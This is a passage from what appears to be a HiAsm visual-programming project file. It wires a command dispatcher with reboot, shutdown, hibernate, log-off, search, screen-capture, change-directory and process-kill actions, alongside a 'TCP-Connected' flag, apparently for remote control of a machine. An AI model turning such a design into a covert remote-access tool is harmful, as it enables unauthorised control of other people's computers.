       link(Str1,16095980:Count,[])
       link(Str2,13572281:Result,[])
       link(Str3,7728773:Data2,[])
      }
      Add(HubEx,4020598,224,105)
      {
       link(onEvent,15456203:doAdd,[])
      }
      Add(Hub,14640254,154,224)
      {
       link(onEvent1,4020598:doWork3,[(228,230)])
       link(onEvent2,10874608:doData,[])
      }
      Add(MultiElementEx,10273696,161,105)
      {
       link(onResult,4020598:doWork2,[])
       link(Op1,16095980:Size,[(167,95)(142,95)(142,147)(104,147)])
      }
      BEGIN_SDK
        Add(EditMultiEx,3571872,3,3)
        {
         WorkCount=#11:doOperation|
         EventCount=#8:onResult|9:onResult1|
         VarCount=#5:Data2|
         DataCount=#3:Op1|
         link(doOperation,3213174:doEvent1,[(26,9)(26,62)])
         link(Data2,13252960:Data2,[(9,174)(111,174)])
        }
        Add(Math,10172649,98,63)
        {
         ResultType=0
         link(onResult,3571872:onResult1,[(216,69)(216,16)])
         link(Op1,3571872:Op1,[(104,33)(9,33)])
         link(Op2,13252960:Data1,[(111,53)(88,53)(88,154)(104,154)])
        }
        Add(GetData,13252960,98,112)
        {
         link(Data,10172649:Result,[])
        }
        Add(Hub,3213174,49,56)
        {
         link(onEvent1,3571872:onResult,[(192,62)(192,9)])
         link(onEvent2,10172649:doOperation,[])
        }
      END_SDK
      Add(GetData,7728773,98,63)
      {
       link(Data,8284417:Var,[(104,53)(145,53)(145,80)(167,80)])
      }
      Add(GlobalVar,8284417,161,56)
      {
       Name="CDir"
      }
      Add(InfoTip,2876050,210,28)
      {
       Info=#30:Это место вообще не доработано|
       Width=120
       Height=39
      }
    END_SDK
    Add(MultiElementEx,207269,462,189)
    {
     @Hint=#4:Kill|
     link(onFString,3202057:doEvent11,[])
    }
    BEGIN_SDK
      Add(EditMultiEx,13034223,3,3)
      {
       WorkCount=#8:doSearch|
       EventCount=#9:onFString|
       Width=482
       Height=277
       link(doSearch,14070701:doDelete,[(12,9)(12,167)])
      }
      Add(WinTools,3741128,259,133)
      {
       Point(doQuit)
       link(Handle,9051226:Var3,[(265,128)])
      }
      Add(Delete,14070701,21,161)
      {
       Count=5
       link(onDelete,11169081:doValue,[])
      }
      Add(Memory,11169081,77,161)
      {
       link(onData,14489737:doLength,[])
      }
      Add(FormatStr,2696186,308,168)
      {
       DataCount=1
       Mask="kill %1 done"
       link(onFString,3057662:doWork2,[])
       link(Str1,9051226:Var1,[(314,104)(132,104)])
      }
      Add(Hub,5792699,217,161)
      {
       link(onEvent1,3741128:doQuit,[])
       link(onEvent2,2696186:doString,[])
      }
      Add(GetDataEx,9051226,126,123)
      {
       Angle=3
       link(Data,11169081:Value,[(105,128)(105,205)(83,205)])
      }
      Add(Length,14489737,126,161)
      {
       link(onLength,6219262:doCompare,[])
       link(Str,9051226:Var2,[])
      }
      Add(If_else,6219262,168,161)
      {
       Type=5
       Op2=Integer(0)
       link(onTrue,5792699:doEvent1,[])
       link(onFalse,12102757:doData,[(212,174)(212,216)])
      }
      Add(DoData,12102757,308,210)
      {
       Data=String(You must specify process ID.)
       link(onEventData,3057662:doWork3,[(389,216)])
      }
      Add(HubEx,3057662,385,168)
      {
       link(onEvent,13034223:onFString,[(440,174)(440,9)])
      }
    END_SDK
    Add(GetData,16168391,231,21)
    {
     link(Data,9364704:Str2,[(237,14)(30,14)])
    }
  END_SDK
  Add(Hub,13362110,339,140)
  {
   link(onEvent1,11419402:doMask,[])
   link(onEvent2,11419402:doCompare,[(381,153)(381,139)])
  }
  Add(StrMask,11419402,388,133)
  {
   Point(doMask)
   link(onTrue,5141308:doEvent,[(432,146)(432,188)(236,188)(236,230)])
   link(Str,6700195:Var3,[(394,110)(142,110)(142,184)])
  }
  Add(GetDataEx,6700195,101,179)
  {
   link(Data,3404427:Value,[])
  }
  Add(ArrayRW,8101568,276,140)
  {
   link(onRead,13362110:doEvent1,[])
   link(Array,2476971:Array,[])
   link(Index,16617176:Var3,[(289,121)])
  }
  Add(IndexToChanel,5141308,248,224)
  {
   Count=15
   Point(Data)
   Point(Index)
   link(onEvent1,1782614:doStrCat,[])
   link(onEvent2,1782614:doStrCat1,[])
   link(onEvent3,1782614:doStrCat2,[])
   link(onEvent4,1782614:doEvent1,[])
   link(onEvent5,1782614:doData,[])
   link(onEvent6,1782614:doEnum,[])
   link(onEvent7,1782614:doReboot,[])
   link(onEvent8,1782614:doShutdown,[])
   link(onEvent9,1782614:doHibernate,[])
   link(onEvent10,1782614:doTimer,[])
   link(onEvent11,1782614:doLogOff,[])
   link(onEvent12,1782614:doSearch,[])
   link(onEvent13,1782614:doCapture,[])
   link(onEvent14,1782614:cd,[])
   link(onEvent15,5076136:doData,[])
   link(Data,5676976:Var2,[])
   link(Index,16617176:Var2,[])
  }
  Add(GetDataEx,5676976,248,200)
  {
   Angle=3
   link(Data,6700195:Var2,[(107,205)])
  }
  Add(For,551597,178,140)
  {
   End=15
   link(onEvent,8101568:doRead,[])
  }
  Add(GetDataEx,16617176,255,116)
  {
   Angle=3
   link(Data,551597:Position,[(220,121)(220,184)(184,184)])
  }
  Add(Hub,8193886,462,224)
  {
   InCount=2
   OutCount=1
   link(onEvent1,1564805:onEvent2,[(503,230)(503,34)])
  }
  Add(DoData,5076136,357,322)
  {
   Data=String(Exiting...)
   link(onEventData,9449181:doEvent1,[])
  }
  Add(Hub,9449181,399,322)
  {
   link(onEvent1,8193886:doEvent2,[(447,328)(447,237)])
   link(onEvent2,1564805:onEvent1,[(475,335)(475,27)])
  }
END_SDK
Add(GlobalVar,8982561,245,252)
{
 Name="TCP-Connected"
}
Add(DoData,7048211,196,252)
{
 Data=Integer(0)
 link(onEventData,8982561:doValue,[])
}
